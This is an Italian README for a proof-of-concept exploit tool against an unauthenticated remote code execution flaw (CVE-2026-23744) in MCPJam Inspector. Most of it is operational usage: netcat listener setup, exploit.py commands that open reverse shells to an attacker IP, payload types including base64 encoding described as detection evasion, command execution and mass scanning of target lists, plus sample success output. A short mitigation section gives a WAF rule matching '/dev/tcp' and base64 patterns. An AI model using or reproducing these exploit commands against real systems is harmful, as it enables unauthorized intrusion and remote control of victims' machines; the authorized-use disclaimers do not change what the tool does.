
Un exploit proof-of-concept per la vulnerabilità CVE-2026-23744 - MCPJam Inspector di Esecuzione di codice remoto (RCE). Questo strumento dimostra la falla di sicurezza nelle versioni <=1.4.2 e aiuta i ricercatori di sicurezza a verificare le patch. Esclusivamente per test autorizzati e scopi educativi. Include molteplici opzioni di payload, esecuzione di comandi e gestione delle sessioni.
Questo strumento è destinato ESCLUSIVAMENTE a test di sicurezza autorizzati e scopi educativi. L'uso non autorizzato è illegale. Gli utenti si assumono ogni responsabilità per le loro azioni.
Questo repository contiene un proof-of-concept per CVE-2026-23744, una vulnerabilità di Esecuzione Remota di Codice (RCE) non autenticata presente in MCPJam Inspector versioni <=1.4.2. La vulnerabilità ha un punteggio CVSS critico di 9.8, indicando un rischio grave con vettore d'attacco di rete.
| Attributo | Dettagli |
|---|---|
| ID CVE | CVE-2026-23744 |
| Vulnerabilità | Esecuzione Remota di Codice non autenticata |
| Versioni Affette | <=1.4.2 |
| Punteggio CVSS | 9.8 (Critico) |
| Vettore d'Attacco | Rete |

Lo strumento di exploit offre un insieme completo di funzionalità progettate per test di sicurezza efficaci:
Per configurare lo strumento di exploit, segui questi passaggi:
Clona il repository:
git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
cd CVE-2026-23744-MCPJam-RCE-Exploit
Installa le dipendenze:
pip install -r requirements.txt
Per avviare uno sfruttamento base, prima configura un listener, poi esegui lo script di exploit:
# Avvia listener
nc -lvnp 4444
# Esegui exploit
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444
Esegui comandi singoli o comandi da file:
# Esegui comando singolo
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"
# Esegui comandi da file
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt
Utilizza vari tipi di payload per scenari differenti:
# Reverse shell Python
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python
# Reverse shell Netcat
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc
# Payload codificato in Base64
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64
Scansiona più target per la vulnerabilità:
# Crea file dei target
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt
# Scansiona per target vulnerabili
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan
Esplora funzionalità avanzate come fingerprinting, uso di proxy, modalità verbose e configurazione automatica del listener:
# Con fingerprinting
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint
# Con proxy
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080
# Modalità verbose
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v
# Listener automatico
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen
| Tipo | Comando | Migliore per |
|---|---|---|
bash | Reverse shell Bash | La maggior parte dei sistemi Linux |
python | Reverse shell Python3 | Sistemi con Python installato |
nc | Reverse shell Netcat | Sistemi con netcat |
perl | Reverse shell Perl | Sistemi con Perl installato |
php | Reverse shell PHP | Sistemi con PHP installato |
base64 | Codifica Base64 | Elusione del rilevamento |
[+] Avvio exploit migliorato contro http://192.168.1.100:8080
[+] Reverse shell verso 10.0.0.5:4444
[*] ID Sessione: AbCdEfGh
[*] Fingerprinting del target...
[+] SO Target: Ubuntu
[+] Capacità disponibili: python3, perl, nc
[*] Esecuzione exploit...
[+] Exploit riuscito!
[!] Controlla il tuo listener netcat su 10.0.0.5:4444
Per proteggersi da CVE-2026-23744, è fondamentale eseguire le seguenti azioni immediate:
POST sospette a /api/mcp/connect.Esempio di regola Nginx WAF per bloccare pattern malevoli comuni:
location /api/mcp/connect {
if ($request_body ~* "bash.*/dev/tcp") { return 403; }
if ($request_body ~* "base64.*-d") { return 403; }
proxy_pass http://backend;
}
D: È legale utilizzarlo?
R: Questo strumento è legale solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta per i test.
D: Quali sistemi sono vulnerabili?
R: Le versioni di MCPJam Inspector <=1.4.2 sono vulnerabili.
D: Come posso proteggere i miei sistemi?
R: Aggiorna immediatamente MCPJam Inspector alla versione >1.4.2.
Sudeepa Wanigarathna
L'uso non autorizzato di questo strumento è illegale e può comportare conseguenze gravi, tra cui:
Fatto con ❤️ da Sudeepa Wanigarathna